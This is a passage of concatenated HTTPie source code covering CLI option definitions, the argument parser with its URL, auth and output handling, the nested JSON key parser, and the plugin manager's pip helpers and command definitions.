used to with the given private key. Only needed if --cert-key is given and the key file requires a passphrase. If not provided, you’ll be prompted interactively. """ ) ####################################################################### # Troubleshooting ####################################################################### troubleshooting = options.add_group('Troubleshooting') troubleshooting.add_argument( '--ignore-stdin', '-I', action='store_true', default=False, short_help='Do not attempt to read stdin' ) troubleshooting.add_argument( '--help', action='help', default=Qualifiers.SUPPRESS, short_help='Show this help message and exit.', ) troubleshooting.add_argument( '--manual', action='manual', default=Qualifiers.SUPPRESS, short_help='Show the full manual.', ) troubleshooting.add_argument( '--version', action='version', version=__version__, short_help='Show version and exit.', ) troubleshooting.add_argument( '--traceback', action='store_true', default=False, short_help='Prints the exception traceback should one occur.', ) troubleshooting.add_argument( '--default-scheme', default='http', short_help='The default scheme to use if not specified in the URL.' ) troubleshooting.add_argument( '--debug', action='store_true', default=False, short_help='Print useful diagnostic information for bug reports.', help=""" Prints the exception traceback should one occur, as well as other information useful for debugging HTTPie itself and for reporting bugs. """, ) ####################################################################### # Finalization ####################################################################### options.finalize() parser = to_argparse(options) File: httpie/cli/exceptions.py class ParseError(Exception): pass File: httpie/cli/argparser.py import argparse import errno import os import re import sys from argparse import RawDescriptionHelpFormatter from textwrap import dedent from urllib.parse import urlsplit from requests.utils import get_netrc_auth from .argtypes import ( AuthCredentials, SSLCredentials, KeyValueArgType, PARSED_DEFAULT_FORMAT_OPTIONS, parse_auth, parse_format_options, ) from .constants import ( HTTP_GET, HTTP_POST, BASE_OUTPUT_OPTIONS, OUTPUT_OPTIONS, OUTPUT_OPTIONS_DEFAULT, OUTPUT_OPTIONS_DEFAULT_OFFLINE, OUTPUT_OPTIONS_DEFAULT_STDOUT_REDIRECTED, OUT_RESP_BODY, PRETTY_MAP, PRETTY_STDOUT_TTY_ONLY, RequestType, SEPARATOR_CREDENTIALS, SEPARATOR_GROUP_ALL_ITEMS, SEPARATOR_GROUP_DATA_ITEMS, URL_SCHEME_RE, ) from .exceptions import ParseError from .requestitems import RequestItems from ..context import Environment from ..plugins.registry import plugin_manager from ..utils import ExplicitNullAuth, get_content_type class HTTPieHelpFormatter(RawDescriptionHelpFormatter): """A nicer help formatter. Help for arguments can be indented and contain new lines. It will be de-dented and arguments in the help will be separated by a blank line for better readability. """ def __init__(self, max_help_position=6, *args, **kwargs): # A smaller indent for args help. kwargs['max_help_position'] = max_help_position super().__init__(*args, **kwargs) def _split_lines(self, text, width): text = dedent(text).strip() + '\n\n' return text.splitlines() def add_usage(self, usage, actions, groups, prefix=None): # Only display the positional arguments displayed_actions = [ action for action in actions if not action.option_strings ] _, exception, _ = sys.exc_info() if ( isinstance(exception, argparse.ArgumentError) and len(exception.args) >= 1 and isinstance(exception.args[0], argparse.Action) ): # add_usage path is also taken when you pass an invalid option, # e.g --style=invalid. If something like that happens, we want # to include to action that caused to the invalid usage into # the list of actions we are displaying. displayed_actions.insert(0, exception.args[0]) super().add_usage( usage, displayed_actions, groups, prefix="usage:\n " ) # TODO: refactor and design type-annotated data structures # for raw args + parsed args and keep things immutable. class BaseHTTPieArgumentParser(argparse.ArgumentParser): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.env = None self.args = None self.has_stdin_data = False self.has_input_data = False # noinspection PyMethodOverriding def parse_args( self, env: Environment, args=None, namespace=None ) -> argparse.Namespace: self.env = env self.args, no_options = self.parse_known_args(args, namespace) if self.args.debug: self.args.traceback = True self.has_stdin_data = ( self.env.stdin and not getattr(self.args, 'ignore_stdin', False) and not self.env.stdin_isatty ) self.has_input_data = self.has_stdin_data or getattr(self.args, 'raw', None) is not None return self.args # noinspection PyShadowingBuiltins def _print_message(self, message, file=None): # Sneak in our stderr/stdout. if hasattr(self, 'root'): env = self.root.env else: env = self.env if env is not None: file = { sys.stdout: env.stdout, sys.stderr: env.stderr, None: env.stderr }.get(file, file) if not hasattr(file, 'buffer') and isinstance(message, str): message = message.encode(env.stdout_encoding) super()._print_message(message, file) class HTTPieManagerArgumentParser(BaseHTTPieArgumentParser): def parse_known_args(self, args=None, namespace=None): try: return super().parse_known_args(args, namespace) except SystemExit as exc: if not hasattr(self, 'root') and exc.code == 2: # Argument Parser Error raise argparse.ArgumentError(None, None) raise class HTTPieArgumentParser(BaseHTTPieArgumentParser): """Adds additional logic to `argparse.ArgumentParser`. Handles all input (CLI args, file args, stdin), applies defaults, and performs extra validation. """ def __init__(self, *args, formatter_class=HTTPieHelpFormatter, **kwargs): kwargs.setdefault('add_help', False) super().__init__(*args, formatter_class=formatter_class, **kwargs) # noinspection PyMethodOverriding def parse_args( self, env: Environment, args=None, namespace=None ) -> argparse.Namespace: self.env = env self.env.args = namespace = namespace or argparse.Namespace() self.args, no_options = super().parse_known_args(args, namespace) if self.args.debug: self.args.traceback = True self.has_stdin_data = ( self.env.stdin and not self.args.ignore_stdin and not self.env.stdin_isatty ) self.has_input_data = self.has_stdin_data or self.args.raw is not None # Arguments processing and environment setup. self._apply_no_options(no_options) self._process_request_type() self._process_download_options() self._setup_standard_streams() self._process_output_options() self._process_pretty_options() self._process_format_options() self._guess_method() self._parse_items() self._process_url() self._process_auth() self._process_ssl_cert() if self.args.raw is not None: self._body_from_input(self.args.raw) elif self.has_stdin_data: self._body_from_file(self.env.stdin) if self.args.compress: # TODO: allow --compress with --chunked / --multipart if self.args.chunked: self.error('cannot combine --compress and --chunked') if self.args.multipart: self.error('cannot combine --compress and --multipart') return self.args def _process_request_type(self): request_type = self.args.request_type self.args.json = request_type is RequestType.JSON self.args.multipart = request_type is RequestType.MULTIPART self.args.form = request_type in { RequestType.FORM, RequestType.MULTIPART, } def _process_url(self): if self.args.url.startswith('://'): # Paste URL & add space shortcut: `http ://pie.dev` → `http://pie.dev` self.args.url = self.args.url[3:] if not URL_SCHEME_RE.match(self.args.url): if os.path.basename(self.env.program_name) == 'https': scheme = 'https://' else: scheme = self.args.default_scheme + '://' # See if we're using curl style shorthand for localhost (:3000/foo) shorthand = re.match(r'^:(?!:)(\d*)(/?.*)$', self.args.url) if shorthand: port = shorthand.group(1) rest = shorthand.group(2) self.args.url = scheme + 'localhost' if port: self.args.url += ':' + port self.args.url += rest else: self.args.url = scheme + self.args.url def _setup_standard_streams(self): """ Modify `env.stdout` and `env.stdout_isatty` based on args, if needed. """ self.args.output_file_specified = bool(self.args.output_file) if self.args.download: # FIXME: Come up with a cleaner solution. if not self.args.output_file and not self.env.stdout_isatty: # Use stdout as the download output file. self.args.output_file = self.env.stdout # With `--download`, we write everything that would normally go to # `stdout` to `stderr` instead. Let's replace the stream so that # we don't have to use many `if`s throughout the codebase. # The response body will be treated separately. self.env.stdout = self.env.stderr self.env.stdout_isatty = self.env.stderr_isatty elif self.args.output_file: # When not `--download`ing, then `--output` simply replaces # `stdout`. The file is opened for appending, which isn't what # we want in this case. self.args.output_file.seek(0) try: self.args.output_file.truncate() except OSError as e: if e.errno == errno.EINVAL: # E.g. /dev/null on Linux. pass else: raise self.env.stdout = self.args.output_file self.env.stdout_isatty = False if self.args.quiet: self.env.quiet = self.args.quiet self.env.stderr = self.env.devnull if not (self.args.output_file_specified and not self.args.download): self.env.stdout = self.env.devnull self.env.apply_warnings_filter() def _process_ssl_cert(self): from httpie.ssl_ import _is_key_file_encrypted if self.args.cert_key_pass is None: self.args.cert_key_pass = SSLCredentials(None) if ( self.args.cert_key is not None and self.args.cert_key_pass.value is None and _is_key_file_encrypted(self.args.cert_key) ): self.args.cert_key_pass.prompt_password(self.args.cert_key) def _process_auth(self): # TODO: refactor & simplify this method. self.args.auth_plugin = None default_auth_plugin = plugin_manager.get_auth_plugins()[0] auth_type_set = self.args.auth_type is not None url = urlsplit(self.args.url) if self.args.auth is None and not auth_type_set: if url.username is not None: # Handle http://username:password@hostname/ username = url.username password = url.password or '' self.args.auth = AuthCredentials( key=username, value=password, sep=SEPARATOR_CREDENTIALS, orig=SEPARATOR_CREDENTIALS.join([username, password]) ) if self.args.auth is not None or auth_type_set: if not self.args.auth_type: self.args.auth_type = default_auth_plugin.auth_type plugin = plugin_manager.get_auth_plugin(self.args.auth_type)() if (not self.args.ignore_netrc and self.args.auth is None and plugin.netrc_parse): # Only host needed, so it’s OK URL not finalized. netrc_credentials = get_netrc_auth(self.args.url) if netrc_credentials: self.args.auth = AuthCredentials( key=netrc_credentials[0], value=netrc_credentials[1], sep=SEPARATOR_CREDENTIALS, orig=SEPARATOR_CREDENTIALS.join(netrc_credentials) ) if plugin.auth_require and self.args.auth is None: self.error('--auth required') plugin.raw_auth = self.args.auth self.args.auth_plugin = plugin already_parsed = isinstance(self.args.auth, AuthCredentials) if self.args.auth is None or not plugin.auth_parse: self.args.auth = plugin.get_auth() else: if already_parsed: # from the URL credentials = self.args.auth else: credentials = parse_auth(self.args.auth) if (not credentials.has_password() and plugin.prompt_password): if self.args.ignore_stdin: # Non-tty stdin read by now self.error( 'Unable to prompt for passwords because' ' --ignore-stdin is set.' ) credentials.prompt_password(url.netloc) if (credentials.key and credentials.value): plugin.raw_auth = credentials.key + ":" + credentials.value self.args.auth = plugin.get_auth( username=credentials.key, password=credentials.value, ) if not self.args.auth and self.args.ignore_netrc: # Set a no-op auth to force requests to ignore .netrc # <https://github.com/psf/requests/issues/2773#issuecomment-174312831> self.args.auth = ExplicitNullAuth() def _apply_no_options(self, no_options): """For every `--no-OPTION` in `no_options`, set `args.OPTION` to its default value. This allows for un-setting of options, e.g., specified in config. """ invalid = [] for option in no_options: if not option.startswith('--no-'): invalid.append(option) continue # --no-option => --option inverted = '--' + option[5:] for action in self._actions: if inverted in action.option_strings: setattr(self.args, action.dest, action.default) break else: invalid.append(option) if invalid: self.error(f'unrecognized arguments: {" ".join(invalid)}') def _body_from_file(self, fd): """Read the data from a file-like object. Bytes are always read. """ self._ensure_one_data_source(self.args.data, self.args.files) self.args.data = getattr(fd, 'buffer', fd) def _body_from_input(self, data): """Read the data from the CLI. """ self._ensure_one_data_source(self.has_stdin_data, self.args.data, self.args.files) self.args.data = data.encode() def _ensure_one_data_source(self, *other_sources): """There can only be one source of input request data. """ if any(other_sources): self.error('Request body (from stdin, --raw or a file) and request ' 'data (key=value) cannot be mixed. Pass ' '--ignore-stdin to let key/value take priority. ' 'See https://httpie.io/docs#scripting for details.') def _guess_method(self): """Set `args.method` if not specified to either POST or GET based on whether the request has data or not. """ if self.args.method is None: # Invoked as `http URL'. assert not self.args.request_items if self.has_input_data: self.args.method = HTTP_POST else: self.args.method = HTTP_GET # FIXME: False positive, e.g., "localhost" matches but is a valid URL. elif not re.match('^[a-zA-Z]+$', self.args.method): # Invoked as `http URL item+'. The URL is now in `args.method` # and the first ITEM is now incorrectly in `args.url`. try: # Parse the URL as an ITEM and store it as the first ITEM arg. self.args.request_items.insert(0, KeyValueArgType( *SEPARATOR_GROUP_ALL_ITEMS).__call__(self.args.url)) except argparse.ArgumentTypeError as e: if self.args.traceback: raise self.error(e.args[0]) else: # Set the URL correctly self.args.url = self.args.method # Infer the method has_data = ( self.has_input_data or any( item.sep in SEPARATOR_GROUP_DATA_ITEMS for item in self.args.request_items) ) self.args.method = HTTP_POST if has_data else HTTP_GET def _parse_items(self): """ Parse `args.request_items` into `args.headers`, `args.data`, `args.params`, and `args.files`. """ try: request_items = RequestItems.from_args( request_item_args=self.args.request_items, request_type=self.args.request_type, ) except ParseError as e: if self.args.traceback: raise self.error(e.args[0]) else: self.args.headers = request_items.headers self.args.data = request_items.data self.args.files = request_items.files self.args.params = request_items.params self.args.multipart_data = request_items.multipart_data if self.args.files and not self.args.form: # `http url @/path/to/file` request_file = None for key, file in self.args.files.items(): if key != '': self.error( 'Invalid file fields (perhaps you meant --form?):' f' {",".join(self.args.files.keys())}') if request_file is not None: self.error("Can't read request from multiple files") request_file = file fn, fd, ct = request_file self.args.files = {} self._body_from_file(fd) if 'Content-Type' not in self.args.headers: content_type = get_content_type(fn) if content_type: self.args.headers['Content-Type'] = content_type def _process_output_options(self): """Apply defaults to output options, or validate the provided ones. The default output options are stdout-type-sensitive. """ def check_options(value, option): unknown = set(value) - OUTPUT_OPTIONS if unknown: self.error(f'Unknown output options: {option}={",".join(unknown)}') if self.args.verbose: self.args.all = True if self.args.output_options is None: if self.args.verbose >= 2: self.args.output_options = ''.join(OUTPUT_OPTIONS) elif self.args.verbose == 1: self.args.output_options = ''.join(BASE_OUTPUT_OPTIONS) elif self.args.offline: self.args.output_options = OUTPUT_OPTIONS_DEFAULT_OFFLINE elif not self.env.stdout_isatty: self.args.output_options = OUTPUT_OPTIONS_DEFAULT_STDOUT_REDIRECTED else: self.args.output_options = OUTPUT_OPTIONS_DEFAULT if self.args.output_options_history is None: self.args.output_options_history = self.args.output_options check_options(self.args.output_options, '--print') check_options(self.args.output_options_history, '--history-print') if self.args.download and OUT_RESP_BODY in self.args.output_options: # Response body is always downloaded with --download and it goes # through a different routine, so we remove it. self.args.output_options = str( set(self.args.output_options) - set(OUT_RESP_BODY)) def _process_pretty_options(self): if self.args.prettify == PRETTY_STDOUT_TTY_ONLY: self.args.prettify = PRETTY_MAP[ 'all' if self.env.stdout_isatty else 'none'] elif (self.args.prettify and self.env.is_windows and self.args.output_file): self.error('Only terminal output can be colorized on Windows.') else: # noinspection PyTypeChecker self.args.prettify = PRETTY_MAP[self.args.prettify] def _process_download_options(self): if self.args.offline: self.args.download = False self.args.download_resume = False return if not self.args.download: if self.args.download_resume: self.error('--continue only works with --download') if self.args.download_resume and not ( self.args.download and self.args.output_file): self.error('--continue requires --output to be specified') def _process_format_options(self): format_options = self.args.format_options or [] parsed_options = PARSED_DEFAULT_FORMAT_OPTIONS for options_group in format_options: parsed_options = parse_format_options(options_group, defaults=parsed_options) self.args.format_options = parsed_options def print_manual(self): from httpie.output.ui import man_pages if man_pages.is_available(self.env.program_name): man_pages.display_for(self.env, self.env.program_name) return None text = self.format_help() with self.env.rich_console.pager(): self.env.rich_console.print( text, highlight=False ) def print_usage(self, file): from rich.text import Text from httpie.output.ui import rich_help whitelist = set() _, exception, _ = sys.exc_info() if ( isinstance(exception, argparse.ArgumentError) and len(exception.args) >= 1 and isinstance(exception.args[0], argparse.Action) and exception.args[0].option_strings ): # add_usage path is also taken when you pass an invalid option, # e.g --style=invalid. If something like that happens, we want # to include to action that caused to the invalid usage into # the list of actions we are displaying. whitelist.add(exception.args[0].option_strings[0]) usage_text = Text('usage', style='bold') usage_text.append(':\n ') usage_text.append(rich_help.to_usage(self.spec, whitelist=whitelist)) self.env.rich_error_console.print(usage_text) def error(self, message): """Prints a usage message incorporating the message to stderr and exits.""" self.print_usage(sys.stderr) self.env.rich_error_console.print( dedent( f''' [bold]error[/bold]: {message} [bold]for more information[/bold]: run '{self.prog} --help' or visit https://httpie.io/docs/cli '''.rstrip() ) ) self.exit(2) File: httpie/cli/dicts.py from collections import OrderedDict from multidict import MultiDict, CIMultiDict class BaseMultiDict(MultiDict): """ Base class for all MultiDicts. """ class HTTPHeadersDict(CIMultiDict, BaseMultiDict): """ Headers are case-insensitive and multiple values are supported through the `add()` API. """ def add(self, key, value): """ Add or update a new header. If the given `value` is `None`, then all the previous values will be overwritten and the value will be set to `None`. """ if value is None: self[key] = value return None # If the previous value for the given header is `None` # then discard it since we are explicitly giving a new # value for it. if key in self and self.getone(key) is None: self.popone(key) super().add(key, value) def remove_item(self, key, value): """ Remove a (key, value) pair from the dict. """ existing_values = self.popall(key) existing_values.remove(value) for value in existing_values: self.add(key, value) class RequestJSONDataDict(OrderedDict): pass class MultiValueOrderedDict(OrderedDict): """Multi-value dict for URL parameters and form data.""" def __setitem__(self, key, value): """ If `key` is assigned more than once, `self[key]` holds a `list` of all the values. This allows having multiple fields with the same name in form data and URL params. """ assert not isinstance(value, list) if key not in self: super().__setitem__(key, value) else: if not isinstance(self[key], list): super().__setitem__(key, [self[key]]) self[key].append(value) def items(self): for key, values in super().items(): if not isinstance(values, list): values = [values] for value in values: yield key, value class RequestQueryParamsDict(MultiValueOrderedDict): pass class RequestDataDict(MultiValueOrderedDict): pass class MultipartRequestDataDict(MultiValueOrderedDict): pass class RequestFilesDict(RequestDataDict): pass File: httpie/cli/nested_json/interpret.py from typing import Type, Union, Any, Iterable, Tuple from .parse import parse, assert_cant_happen from .errors import NestedJSONSyntaxError from .tokens import EMPTY_STRING, TokenKind, Token, PathAction, Path, NestedJSONArray __all__ = [ 'interpret_nested_json', 'unwrap_top_level_list_if_needed', ] JSONType = Type[Union[dict, list, int, float, str]] JSON_TYPE_MAPPING = { dict: 'object', list: 'array', int: 'number', float: 'number', str: 'string', } def interpret_nested_json(pairs: Iterable[Tuple[str, str]]) -> dict: context = None for key, value in pairs: context = interpret(context, key, value) return wrap_with_dict(context) def interpret(context: Any, key: str, value: Any) -> Any: cursor = context paths = list(parse(key)) paths.append(Path(PathAction.SET, value)) # noinspection PyShadowingNames def type_check(index: int, path: Path, expected_type: JSONType): if not isinstance(cursor, expected_type): if path.tokens: pseudo_token = Token( kind=TokenKind.PSEUDO, value='', start=path.tokens[0].start, end=path.tokens[-1].end, ) else: pseudo_token = None cursor_type = JSON_TYPE_MAPPING.get(type(cursor), type(cursor).__name__) required_type = JSON_TYPE_MAPPING[expected_type] message = f'Cannot perform {path.kind.to_string()!r} based access on ' message += repr(''.join(path.reconstruct() for path in paths[:index])) message += f' which has a type of {cursor_type!r} but this operation' message += f' requires a type of {required_type!r}.' raise NestedJSONSyntaxError( source=key, token=pseudo_token, message=message, message_kind='Type', ) def object_for(kind: PathAction) -> Any: if kind is PathAction.KEY: return {} elif kind in {PathAction.INDEX, PathAction.APPEND}: return [] else: assert_cant_happen() for index, (path, next_path) in enumerate(zip(paths, paths[1:])): # If there is no context yet, set it. if cursor is None: context = cursor = object_for(path.kind) if path.kind is PathAction.KEY: type_check(index, path, dict) if next_path.kind is PathAction.SET: cursor[path.accessor] = next_path.accessor break cursor = cursor.setdefault(path.accessor, object_for(next_path.kind)) elif path.kind is PathAction.INDEX: type_check(index, path, list) if path.accessor < 0: raise NestedJSONSyntaxError( source=key, token=path.tokens[1], message='Negative indexes are not supported.', message_kind='Value', ) cursor.extend([None] * (path.accessor - len(cursor) + 1)) if next_path.kind is PathAction.SET: cursor[path.accessor] = next_path.accessor break if cursor[path.accessor] is None: cursor[path.accessor] = object_for(next_path.kind) cursor = cursor[path.accessor] elif path.kind is PathAction.APPEND: type_check(index, path, list) if next_path.kind is PathAction.SET: cursor.append(next_path.accessor) break cursor.append(object_for(next_path.kind)) cursor = cursor[-1] else: assert_cant_happen() return context def wrap_with_dict(context): if context is None: return {} elif isinstance(context, list): return { EMPTY_STRING: NestedJSONArray(context), } else: assert isinstance(context, dict) return context def unwrap_top_level_list_if_needed(data: dict): """ Propagate the top-level list, if that’s what we got. """ if len(data) == 1: key, value = list(data.items())[0] if isinstance(value, NestedJSONArray): assert key == EMPTY_STRING return value return data File: httpie/cli/nested_json/__init__.py """ A library for parsing the HTTPie nested JSON key syntax and constructing the resulting objects. <https://httpie.io/docs/cli/nested-json> It has no dependencies. """ from .interpret import interpret_nested_json, unwrap_top_level_list_if_needed from .errors import NestedJSONSyntaxError from .tokens import EMPTY_STRING, NestedJSONArray __all__ = [ 'interpret_nested_json', 'unwrap_top_level_list_if_needed', 'EMPTY_STRING', 'NestedJSONArray', 'NestedJSONSyntaxError' ] File: httpie/cli/nested_json/tokens.py from enum import Enum, auto from typing import NamedTuple, Union, Optional, List EMPTY_STRING = '' HIGHLIGHTER = '^' OPEN_BRACKET = '[' CLOSE_BRACKET = ']' BACKSLASH = '\\' class TokenKind(Enum): TEXT = auto() NUMBER = auto() LEFT_BRACKET = auto() RIGHT_BRACKET = auto() PSEUDO = auto() # Not a real token, use when representing location only. def to_name(self) -> str: for key, value in OPERATORS.items(): if value is self: return repr(key) else: return 'a ' + self.name.lower() OPERATORS = { OPEN_BRACKET: TokenKind.LEFT_BRACKET, CLOSE_BRACKET: TokenKind.RIGHT_BRACKET, } SPECIAL_CHARS = OPERATORS.keys() | {BACKSLASH} LITERAL_TOKENS = [ TokenKind.TEXT, TokenKind.NUMBER, ] class Token(NamedTuple): kind: TokenKind value: Union[str, int] start: int end: int class PathAction(Enum): KEY = auto() INDEX = auto() APPEND = auto() # Pseudo action, used by the interpreter SET = auto() def to_string(self) -> str: return self.name.lower() class Path: def __init__( self, kind: PathAction, accessor: Optional[Union[str, int]] = None, tokens: Optional[List[Token]] = None, is_root: bool = False, ): self.kind = kind self.accessor = accessor self.tokens = tokens or [] self.is_root = is_root def reconstruct(self) -> str: if self.kind is PathAction.KEY: if self.is_root: return str(self.accessor) return OPEN_BRACKET + self.accessor + CLOSE_BRACKET elif self.kind is PathAction.INDEX: return OPEN_BRACKET + str(self.accessor) + CLOSE_BRACKET elif self.kind is PathAction.APPEND: return OPEN_BRACKET + CLOSE_BRACKET class NestedJSONArray(list): """Denotes a top-level JSON array.""" File: httpie/cli/nested_json/errors.py from typing import Optional from .tokens import Token, HIGHLIGHTER class NestedJSONSyntaxError(ValueError): def __init__( self, source: str, token: Optional[Token], message: str, message_kind: str = 'Syntax', ) -> None: self.source = source self.token = token self.message = message self.message_kind = message_kind def __str__(self): lines = [f'HTTPie {self.message_kind} Error: {self.message}'] if self.token is not None: lines.append(self.source) lines.append( ' ' * self.token.start + HIGHLIGHTER * (self.token.end - self.token.start) ) return '\n'.join(lines) File: httpie/cli/nested_json/parse.py from typing import Iterator from .errors import NestedJSONSyntaxError from .tokens import ( EMPTY_STRING, BACKSLASH, TokenKind, OPERATORS, SPECIAL_CHARS, LITERAL_TOKENS, Token, PathAction, Path, ) __all__ = [ 'parse', 'assert_cant_happen', ] def parse(source: str) -> Iterator[Path]: """ start: root_path path* root_path: (literal | index_path | append_path) literal: TEXT | NUMBER path: key_path | index_path | append_path key_path: LEFT_BRACKET TEXT RIGHT_BRACKET index_path: LEFT_BRACKET NUMBER RIGHT_BRACKET append_path: LEFT_BRACKET RIGHT_BRACKET """ tokens = list(tokenize(source)) cursor = 0 def can_advance(): return cursor < len(tokens) # noinspection PyShadowingNames def expect(*kinds): nonlocal cursor assert kinds if can_advance(): token = tokens[cursor] cursor += 1 if token.kind in kinds: return token elif tokens: token = tokens[-1]._replace( start=tokens[-1].end + 0, end=tokens[-1].end + 1, ) else: token = None if len(kinds) == 1: suffix = kinds[0].to_name() else: suffix = ', '.join(kind.to_name() for kind in kinds[:-1]) suffix += ' or ' + kinds[-1].to_name() message = f'Expecting {suffix}' raise NestedJSONSyntaxError(source, token, message) # noinspection PyShadowingNames def parse_root(): tokens = [] if not can_advance(): return Path( kind=PathAction.KEY, accessor=EMPTY_STRING, is_root=True ) # (literal | index_path | append_path)? token = expect(*LITERAL_TOKENS, TokenKind.LEFT_BRACKET) tokens.append(token) if token.kind in LITERAL_TOKENS: action = PathAction.KEY value = str(token.value) elif token.kind is TokenKind.LEFT_BRACKET: token = expect(TokenKind.NUMBER, TokenKind.RIGHT_BRACKET) tokens.append(token) if token.kind is TokenKind.NUMBER: action = PathAction.INDEX value = token.value tokens.append(expect(TokenKind.RIGHT_BRACKET)) elif token.kind is TokenKind.RIGHT_BRACKET: action = PathAction.APPEND value = None else: assert_cant_happen() else: assert_cant_happen() # noinspection PyUnboundLocalVariable return Path( kind=action, accessor=value, tokens=tokens, is_root=True ) yield parse_root() # path* while can_advance(): path_tokens = [expect(TokenKind.LEFT_BRACKET)] token = expect(TokenKind.TEXT, TokenKind.NUMBER, TokenKind.RIGHT_BRACKET) path_tokens.append(token) if token.kind is TokenKind.RIGHT_BRACKET: path = Path(PathAction.APPEND, tokens=path_tokens) elif token.kind is TokenKind.TEXT: path = Path(PathAction.KEY, token.value, tokens=path_tokens) path_tokens.append(expect(TokenKind.RIGHT_BRACKET)) elif token.kind is TokenKind.NUMBER: path = Path(PathAction.INDEX, token.value, tokens=path_tokens) path_tokens.append(expect(TokenKind.RIGHT_BRACKET)) else: assert_cant_happen() # noinspection PyUnboundLocalVariable yield path def tokenize(source: str) -> Iterator[Token]: cursor = 0 backslashes = 0 buffer = [] def send_buffer() -> Iterator[Token]: nonlocal backslashes if not buffer: return None value = ''.join(buffer) kind = TokenKind.TEXT if not backslashes: for variation, kind in [ (int, TokenKind.NUMBER), (check_escaped_int, TokenKind.TEXT), ]: try: value = variation(value) except ValueError: continue else: break yield Token( kind=kind, value=value, start=cursor - (len(buffer) + backslashes), end=cursor, ) buffer.clear() backslashes = 0 def can_advance() -> bool: return cursor < len(source) while can_advance(): index = source[cursor] if index in OPERATORS: yield from send_buffer() yield Token(OPERATORS[index], index, cursor, cursor + 1) elif index == BACKSLASH and can_advance(): if source[cursor + 1] in SPECIAL_CHARS: backslashes += 1 else: buffer.append(index) buffer.append(source[cursor + 1]) cursor += 1 else: buffer.append(index) cursor += 1 yield from send_buffer() def check_escaped_int(value: str) -> str: if not value.startswith(BACKSLASH): raise ValueError('Not an escaped int') try: int(value[1:]) except ValueError as exc: raise ValueError('Not an escaped int') from exc else: return value[1:] def assert_cant_happen(): raise ValueError('Unexpected value') File: httpie/manager/compat.py import sys import shutil import subprocess from contextlib import suppress from typing import List, Optional from httpie.compat import is_frozen class PipError(Exception): """An exception that occurs when pip exits with an error status code.""" def __init__(self, stdout, stderr): self.stdout = stdout self.stderr = stderr def _discover_system_pip() -> List[str]: # When we are running inside of a frozen binary, we need the system # pip to install plugins since there is no way for us to execute any # code outside of the HTTPie. # # We explicitly depend on system pip, so the SystemError should not # be executed (except for broken installations). def _check_pip_version(pip_location: Optional[str]) -> bool: if not pip_location: return False with suppress(subprocess.CalledProcessError): stdout = subprocess.check_output([pip_location, "--version"], text=True) return "python 3" in stdout targets = [ "pip", "pip3" ] for target in targets: pip_location = shutil.which(target) if _check_pip_version(pip_location): return pip_location raise SystemError("Couldn't find 'pip' executable. Please ensure that pip in your system is available.") def _run_pip_subprocess(pip_executable: List[str], args: List[str]) -> bytes: cmd = [*pip_executable, *args] try: process = subprocess.run( cmd, check=True, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE ) except subprocess.CalledProcessError as error: raise PipError(error.stdout, error.stderr) from error else: return process.stdout def run_pip(args: List[str]) -> bytes: if is_frozen: pip_executable = [_discover_system_pip()] else: pip_executable = [sys.executable, '-m', 'pip'] return _run_pip_subprocess(pip_executable, args) File: httpie/manager/__init__.py File: httpie/manager/core.py import argparse from typing import Optional from httpie.context import Environment from httpie.status import ExitStatus from httpie.manager.cli import missing_subcommand, parser from httpie.manager.tasks import CLI_TASKS MSG_COMMAND_CONFUSION = '''\ This command is only for managing HTTPie plugins. To send a request, please use the http/https commands: $ http {args} $ https {args} ''' # noinspection PyStringFormat MSG_NAKED_INVOCATION = f'''\ {missing_subcommand()} {MSG_COMMAND_CONFUSION} '''.rstrip("\n").format(args='POST pie.dev/post hello=world') def dispatch_cli_task(env: Environment, action: Optional[str], args: argparse.Namespace) -> ExitStatus: if action is None: parser.error(missing_subcommand('cli')) return CLI_TASKS[action](env, args) def program(args: argparse.Namespace, env: Environment) -> ExitStatus: if args.action is None: parser.error(MSG_NAKED_INVOCATION) if args.action == 'plugins': return dispatch_cli_task(env, args.action, args) elif args.action == 'cli': return dispatch_cli_task(env, args.cli_action, args) return ExitStatus.SUCCESS File: httpie/manager/cli.py from textwrap import dedent from httpie.cli.argparser import HTTPieManagerArgumentParser from httpie.cli.options import Qualifiers, ARGPARSE_QUALIFIER_MAP, map_qualifiers, parser_to_parser_spec from httpie import __version__ CLI_SESSION_UPGRADE_FLAGS = [ { 'flags': ['--bind-cookies'], 'action': 'store_true', 'default': False, 'help': 'Bind domainless cookies to the host that session belongs.' } ] COMMANDS = { 'cli': { 'help': 'Manage HTTPie for Terminal', 'export-args': [ 'Export available options for the CLI', { 'flags': ['-f', '--format'], 'choices': ['json'], 'help': 'Format to export in.', 'default': 'json' } ], 'check-updates': [ 'Check for updates' ], 'sessions': { 'help': 'Manage HTTPie sessions', 'upgrade': [ 'Upgrade the given HTTPie session with the latest ' 'layout. A list of changes between different session versions ' 'can be found in the official documentation.', { 'dest': 'hostname', 'metavar': 'HOSTNAME', 'help': 'The host this session belongs.' }, { 'dest': 'session', 'metavar': 'SESSION_NAME_OR_PATH', 'help': 'The name or the path for the session that will be upgraded.' }, *CLI_SESSION_UPGRADE_FLAGS ], 'upgrade-all': [ 'Upgrade all named sessions with the latest layout. A list of ' 'changes between different session versions can be found in the official ' 'documentation.', *CLI_SESSION_UPGRADE_FLAGS ], } } } COMMANDS['plugins'] = COMMANDS['cli']['plugins'] = { 'help': 'Manage HTTPie plugins.', 'install': [ 'Install the given targets from PyPI ' 'or from a local paths.', { 'dest': 'targets', 'metavar': 'TARGET', 'nargs': Qualifiers.ONE_OR_MORE, 'help': 'targets to install' } ], 'upgrade': [ 'Upgrade the given plugins', { 'dest': 'targets', 'metavar': 'TARGET', 'nargs': Qualifiers.ONE_OR_MORE, 'help': 'targets to upgrade' } ], 'uninstall': [ 'Uninstall the given HTTPie plugins.', { 'dest': 'targets', 'metavar': 'TARGET', 'nargs': Qualifiers.ONE_OR_MORE, 'help': 'targets to install' } ], 'list': [ 'List all installed HTTPie plugins.' ], } def missing_subcommand(*args) -> str: base = COMMANDS for arg in args: base = base[arg] assert isinstance(base, dict) subcommands = ', '.join(map(repr, base.keys())) return f'Please specify one of these: {subcommands}' def generate_subparsers(root, parent_parser, definitions, spec): action_dest = '_'.join(parent_parser.prog.split()[1:] + ['action']) actions = parent_parser.add_subparsers( dest=action_dest ) for command, properties in definitions.items(): is_subparser = isinstance(properties, dict) properties = properties.copy() descr = properties.pop('help', None) if is_subparser else properties.pop(0) command_parser = actions.add_parser(command, description=descr) command_parser.root = root if is_subparser: generate_subparsers(root, command_parser, properties, spec) continue group = spec.add_group(parent_parser.prog + ' ' + command, description=descr) for argument in properties: argument = 